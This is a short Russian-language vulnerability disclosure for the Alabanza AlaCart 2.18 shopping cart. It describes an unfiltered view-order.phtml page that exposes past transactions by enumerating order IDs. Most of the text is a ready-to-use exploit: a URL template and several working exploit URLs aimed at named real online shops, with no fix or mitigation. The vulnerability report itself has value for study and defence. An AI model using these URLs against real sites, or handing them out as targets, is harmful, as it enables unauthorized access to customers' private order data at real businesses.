Мною обнаружена уязвимость в системе AlaCart Version 2.18
Application: Alabanza AlaCart Shopping Cart
Problem-Type: удаленная
Vulnerability: просмотр информации о транзакциях.
Vendor: alabanza.com
Risk: низкий
Exploit:
http://www.xxx.com/s-cart/view-order.phtml? f_strFirstName=[любые символы]&&f_strLastName
=[любые символы]&f_intOrderID= [номер транзакции]
Файл view-order.phtml не фильтрует параметры, поэтому возможен просмотр информации о проведенных ранее транзакциях магазина, минуя ввод пароля/логина администратора.
Номер транзакции подбирается обычным перебором 1,2,3...121 и так далее. В случае отсутствия записи о имеющейся транзакции, ответ сервера:
Order #135 could not be found or does not exist.
Пример:
http://alacart.metapros.net/s-cart/view-order.phtml? f_strFirstName=Jeff&f_strLastName=
Daggs&f_intOrderID=135
Пример уязвимости:
http://notebookmaker.com/s-cart/view-order.phtml? f_strFirstName=aaa&f_strLastName=a
aaa&f_intOrderID=128
http://kingfishtackle.com/s-cart/view-order.phtml? f_strFirstName=bbb&f_strLastName=
bbb&f_intOrderID=163
http://www.arsenaltraining.com/s-cart/view-order.phtml? f_strFirstName=durito&f_strLastName=
durito&f_intOrderID=134
http://lightlens.com/s-cart/view-order.phtml?f_strFirstName =333&f_strLastName=333&f_intOrderID=121
http://www.asbp.org/s-cart/view-order.phtml?f_strFirstName =444&f_strLastName=444&f_intOrderID=121